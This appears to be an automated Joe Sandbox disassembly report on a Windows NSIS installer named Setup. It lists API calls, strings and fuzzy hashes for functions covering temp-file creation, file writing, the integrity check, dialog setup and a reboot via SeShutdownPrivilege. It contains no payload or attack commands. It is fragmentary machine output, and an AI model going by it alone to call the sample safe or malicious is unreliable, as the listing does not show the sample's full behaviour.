                                                                                                                                                                                • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                              • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                                                                                • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                              • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                                                                              • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                                                                              • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                                                                              • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                                                                              • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                                                              • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                                                              • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                                                              • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                                                              • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                                                              • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                                                              • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                              • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                                                                              • API String ID: 2435955865-3712954417
                                                                                                                                                                              • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                              • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                                                                                                              • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                              • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
                                                                                                                                                                              APIs
                                                                                                                                                                              • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                                                              • String ID: jF
                                                                                                                                                                              • API String ID: 2295610775-3349280890
                                                                                                                                                                              • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                              • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                                                                                                              • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                              • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                              • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 310444273-0
                                                                                                                                                                              • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                              • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                                                                                                              • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                              • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              Control-flow graph of the function at 004015A0 (basic blocks 004015A0 through 004019F8, plus the shared exit blocks at 004030DD-004030F2): the dispatch switch at 004015FA fans out to the individual handlers whose APIs and log strings are listed below. The rendered graph and its executed/not-executed colouring are not reproduced in this text listing.
                                                                                                                                                                              APIs
                                                                                                                                                                              • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                              • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                              • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                              • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                              • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                              • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                              • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                              • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                              • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                              • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                              • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                              Strings
                                                                                                                                                                              • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                              • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                                              • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                              • Rename: %s, xrefs: 004018F8
                                                                                                                                                                              • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                                              • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                              • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                              • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                              • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                              • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                              • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                              • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                              • Jump: %d, xrefs: 00401602
                                                                                                                                                                              • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                              • Call: %d, xrefs: 0040165A
                                                                                                                                                                              • BringToFront, xrefs: 004016BD
                                                                                                                                                                              • detailprint: %s, xrefs: 00401679
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                                              • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                              • API String ID: 2872004960-3619442763
                                                                                                                                                                              • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                              • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                                                                                                              • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                              • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

Control-flow Graph
APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
• ShowWindow.USER32(?), ref: 004054FE
• DestroyWindow.USER32 ref: 00405512
• SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
• GetDlgItem.USER32(?,?), ref: 0040554F
• SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
• IsWindowEnabled.USER32(00000000), ref: 0040556A
• GetDlgItem.USER32(?,00000001), ref: 00405619
• GetDlgItem.USER32(?,00000002), ref: 00405623
• SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
• SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
• GetDlgItem.USER32(?,00000003), ref: 00405734
• ShowWindow.USER32(00000000,?), ref: 00405756
• KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
• EnableWindow.USER32(?,?), ref: 00405783
• GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
• EnableMenuItem.USER32(00000000), ref: 004057A0
• SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
• SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
• lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
• SetWindowTextW.USER32(?,00451D98), ref: 00405808
• ShowWindow.USER32(?,0000000A), ref: 0040593C
Memory Dump Source
• Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
• String ID:
• API String ID: 3282139019-0
• Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
• Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
• Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
• Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

Control-flow Graph
APIs
  • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
  • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
  • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
• lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
• lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
• lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
• GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
  • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
• LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
• RegisterClassW.USER32(00476A40), ref: 00405B36
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
• CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
  • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
• ShowWindow.USER32(00000005,00000000), ref: 00405BBD
• LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
• LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
• GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
• GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
• RegisterClassW.USER32(00476A40), ref: 00405BFF
• DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
• String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
• API String ID: 608394941-2746725676
• Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
• Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
• Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
• Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

Control-flow Graph

APIs
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
• lstrcatW.KERNEL32(00000000,00000000,HandbookFirmware,004D70B0,00000000,00000000), ref: 00401A76
• CompareFileTime.KERNEL32(-00000014,?,HandbookFirmware,HandbookFirmware,00000000,00000000,HandbookFirmware,004D70B0,00000000,00000000), ref: 00401AA0
  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427D76,759223A0,00000000), ref: 00404FD6
  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427D76,759223A0,00000000), ref: 00404FE6
  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427D76,759223A0,00000000), ref: 00404FF9
  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
Strings
Memory Dump Source
• Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                              • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$HandbookFirmware
                                                                                                                                                                              • API String ID: 4286501637-590510232
                                                                                                                                                                              • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                              • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                                                                                              • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                              • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

Control-flow Graph

APIs
• GetTickCount.KERNEL32 ref: 004033F1
• GetTickCount.KERNEL32 ref: 00403492
• MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
• wsprintfW.USER32 ref: 004034CE
• WriteFile.KERNELBASE(00000000,00000000,00427D76,00403792,00000000), ref: 004034FF
• WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
Strings
Memory Dump Source
• Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: CountFileTickWrite$wsprintf
• String ID: (]C$... %d%%$pAB$v}B$y=B
• API String ID: 651206458-2063389020
• Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
• Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
• Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
• Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

Control-flow Graph

APIs
• GetTickCount.KERNEL32 ref: 004035C4
• GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
  • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
  • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
• GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
Strings
• soft, xrefs: 004036A1
• Error launching installer, xrefs: 00403603
• Null, xrefs: 004036AA
• Inst, xrefs: 00403698
• Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
Memory Dump Source
• Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: File$AttributesCountCreateModuleNameSizeTick
• String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
• API String ID: 4283519449-527102705
• Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
• Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
• Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
• Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

